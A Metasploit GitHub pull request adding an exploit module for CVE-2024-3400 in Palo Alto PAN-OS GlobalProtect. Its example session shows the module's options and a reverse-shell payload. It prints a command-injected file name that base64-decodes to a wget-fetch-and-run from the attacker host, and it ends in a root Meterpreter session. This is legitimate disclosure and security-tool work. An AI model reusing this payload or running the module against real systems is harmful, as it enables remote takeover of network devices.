Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Exploit module for CVE-2024-3400 - Palo Alto Networks PAN-OS #19101

Merged
10 commits merged into from Apr 19, 2024
Merged

Exploit module for CVE-2024-3400 - Palo Alto Networks PAN-OS #19101

10 commits merged into from Apr 19, 2024

Conversation

remmons-r7
Copy link
Contributor

@remmons-r7 remmons-r7 commented Apr 17, 2024
edited

This pull request is an exploit module for https://security.paloaltonetworks.com/CVE-2024-3400, affecting PAN-OS GlobalProtect Gateway and GlobalProtect Portal deployments with the default telemetry service enabled.

Example usage:

msf6 > use exploit/linux/http/panos_telemetry_cmd_exec
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > show options

Module options (exploit/linux/http/panos_telemetry_cmd_exec):

   Name       Current Setting            Required  Description
   ----       ---------------            --------  -----------
   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      443                        yes       The target port (TCP)
   SSL        true                       no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /global-protect/login.esp  yes       An existing web application endpoint
   VHOST                                 no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      ugVfXWRxV        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /var/tmp         yes       Remote writable dir to store payload; cannot contain spaces
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Default



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/panos_telemetry_cmd_exec) > set RHOSTS 192.168.50.226
RHOSTS => 192.168.50.226
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > set LHOST 192.168.50.25
LHOST => 192.168.50.25
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > set LPORT 8585
LPORT => 8585
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > check
[+] 192.168.50.226:443 - The target is vulnerable. Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/glyphicons-ipteqmbl-regular.woff2 NOTE: This file will not be deleted
msf6 exploit(linux/http/panos_telemetry_cmd_exec) > exploit

[*] Started reverse TCP handler on 192.168.50.25:8585 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/glyphicons-ikxrpbmq-regular.woff2 NOTE: This file will not be deleted
[*] Depending on the PAN-OS version, it may take the telemetry service up to one hour to execute the payload
[*] Though exploitation of the arbitrary file creation vulnerability succeeded, command injection will fail if the default telemetry service has been disabled
[*] Meterpreter session 1 opened (192.168.50.25:8585 -> 192.168.50.216:48310) at 2024-04-18 14:53:09 -0500
[!] This exploit may require manual cleanup of '/opt/panlogs/tmp/device_telemetry/minute/lyne`echo${IFS}-n${IFS}d2dldCAtcU8gL3Zhci90bXAvdWdWZlhXUnhWIGh0dHA6Ly8xOTIuMTY4LjUwLjI1OjgwODAvcUpPXzJ2MUFPVkRIc2hsVVIyRHVzQTsgY2htb2QgK3ggL3Zhci90bXAvdWdWZlhXUnhWOyAvdmFyL3RtcC91Z1ZmWFdSeFYgJg==|base64${IFS}-d|bash${IFS}-`' on the target

meterpreter > getuid 
Server username: root
meterpreter > sysinfo 
Computer     : 192.168.50.216
OS           : CentOS 8.3.2011 (Linux 4.18.0-240.1.1.20.pan.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Thank you!

remmons-r7 and others added 4 commits April 17, 2024 13:52
@remmons-r7
Draft of CVE-2024-3400 module
41e19d7
@remmons-r7
Fix single char
275345b
@remmons-r7
Addressing msftidy issues
7e191c7 
Fixes for the following:
W: 80:  5: [Correctable] Lint/UselessAssignment: Useless assignment to variable - res_create_file. Did you mean res_check_created?
C: 90: 81: [Correctable] Style/TrailingCommaInArguments: Avoid comma after the last parameter of a method call.
C: 93:  8: [Correctable] Style/InverseMethods: Use != instead of inverting ==.
C: 93: 42: [Correctable] Style/AndOr: Use && instead of and.
C: 93: 46: [Correctable] Style/InverseMethods: Use != instead of inverting ==.
C: 94: 43: [Correctable] Style/StringLiterals: Prefer single-quoted strings when you don't need string interpolation or special symbols.
C:100: 18: [Correctable] Style/StringLiterals: Prefer single-quoted strings when you don't need string interpolation or special symbols.
C:131: 18: [Correctable] Style/StringLiterals: Prefer single-quoted strings when you don't need string interpolation or special symbols.
@remmons-r7
Addressing a new issue the linter caught after changes
9741b12 
W:117:  5: [Correctable] Lint/UselessAssignment: Useless assignment to variable - res.
@smcintyre-r7 smcintyre-r7 added module hotness Something we're really excited about needs-docs rn-modules release notes for new or majorly enhanced modules labels Apr 17, 2024
@github-actions GitHub Actions
Copy link

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@bwatters-r7 bwatters-r7 self-assigned this Apr 18, 2024
@remmons-r7 remmons-r7 marked this pull request as draft April 18, 2024 16:22
remmons-r7 and others added 2 commits April 18, 2024 18:21
@remmons-r7
Incorporating PAN-OS module peer review suggestions, adding documenta…
982b6ae 
…tion for the module
@remmons-r7
Addressing msftidy issues
5df1052 
C:132: 20: [Correctable] Layout/SpaceAroundBlockParameters: Space before first block parameter detected.
C:132: 30: [Correctable] Layout/SpaceAroundBlockParameters: Space after last block parameter detected.
C:133:  5: [Correctable] Layout/IndentationWidth: Use 2 (not 4) spaces for indentation.
C:143:  4: [Correctable] Layout/TrailingEmptyLines: Final newline missing.
@remmons-r7 remmons-r7 marked this pull request as ready for review April 18, 2024 23:36
@bwatters-r7 bwatters-r7 closed this pull request by merging all changes into rapid7:master in 4733d1d Apr 19, 2024
@bwatters-r7
Copy link
Contributor

bwatters-r7 commented Apr 19, 2024
edited by smcintyre-r7

Release Notes

This adds an exploit module for https://security.paloaltonetworks.com/CVE-2024-3400, affecting PAN-OS GlobalProtect Gateway and GlobalProtect Portal deployments with the default telemetry service enabled.

@wvu
Copy link
Contributor

wvu commented Apr 22, 2024

Hey, can we fix the CVE in the title? Thanks!

@bwatters-r7 bwatters-r7 changed the title Exploit module for CVE-2024-4300 - Palo Alto Networks PAN-OS Exploit module for CVE-2024-3400 - Palo Alto Networks PAN-OS Apr 22, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@0xv1n 0xv1n 0xv1n left review comments

@bwatters-r7 bwatters-r7 bwatters-r7 left review comments

@sjanusz-r7 sjanusz-r7 sjanusz-r7 left review comments

Assignees

@bwatters-r7 bwatters-r7

Labels
hotness Something we're really excited about module needs-docs rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
6 participants
@remmons-r7 @bwatters-r7 @wvu @0xv1n @sjanusz-r7 @smcintyre-r7